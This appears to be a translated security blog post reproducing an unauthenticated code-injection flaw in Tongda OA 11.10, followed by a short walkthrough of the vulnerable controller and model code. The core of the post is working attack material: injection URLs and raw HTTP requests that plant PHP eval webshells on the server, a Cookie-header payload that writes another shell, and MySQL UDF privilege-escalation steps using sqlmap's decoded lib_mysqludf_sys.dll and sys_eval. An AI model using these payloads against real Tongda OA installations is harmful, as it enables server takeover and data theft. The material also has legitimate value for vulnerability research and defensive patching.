Vulnerability Profile
I also did a more specific analysis and vulnerability mining on Tongda oa before. A few days ago, I saw that Tongda oa 11.10 had an unauthorized file upload vulnerability, so I also planned to reproduce and analyze it.
Environment build
https://www.tongda2000.com/download/p2019.php
Download link: https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe
View version information
Vulnerability recurrence
Use method one
http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
Use method two
Can't write directly to php file with variables
So first use the no-parameter webshell
<?php @eval(next(getallheaders()));
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1
Host: 192.168.222.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
After the upload is successful, use the malicious file generated for the first time to regenerate the file
GET /general/test.php HTTP/1.1
Host: 192.168.121.147:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: file_put_contents('test1.php','<?php @eval($_REQUEST[1]);');
Content-Length: 28
Upgrade-Insecure-Requests: 1
However, it is not possible to order directly. This is because the authority is too low, so if you want to perform further operations, you need to escalate the authority
See the password of the mysql database by viewing the configuration file
Use Ant Sword to connect to the database
Check mysql version
| MySQL version | Privilege escalation dll storage location |
| >5.1 | /lib/plugin/ under mysql root path (select @@basedir) |
| <5.1 | Under the system directory c:\windows\system32 |
The corresponding privilege escalation file is integrated in SqlMap, but it needs to be decrypted first
udf.dll is encoded and calculated, so there needs to be a decryption script under this path
sqlmap-master\extra\cloak
Corresponding dll file path
sqlmap-master\data\udf\mysql\windows\64
perform decode operation
cloak.py -d -i sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_
Then upload the decoded file to the path mysql/lib/plugin/
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
select sys_eval("whoami");
Vulnerability analysis
general\appbuilder\modules\portal\controllers\GatewayController.php#actionGetdata
First judge whether there is a parameter id, then execute the GetData and toUTF8 methods in sequence according to the value of the module
general\appbuilder\modules\portal\models\PortalComponent.php#GetData
According to the id query, return the corresponding value. The value of $activeTab is obtained from the outside
Call different get_datamethods according to different $modules
general\appbuilder\modules\portal\components\AppDesignComponents.php#data_analysis
general\appbuilder\modules\appdesign\models\AppUtils.php#toUTF8
This is a bit similar to wide-byte injection. Using type conversion, the incoming single quotes are transferred and then encoded and converted into Chinese characters, and finally the single quotes escape. Finally, execute the command.
Call for original manuscripts
Call for original technical articles, welcome to post
Submission email: [email protected]
Article type: hacker geek technology, information security hotspots, security research and analysis, etc.
If you pass the review and publish it, you can get a remuneration ranging from 200-800 yuan.
For more details, click me to view!
Shooting range practice, click "Read the original text"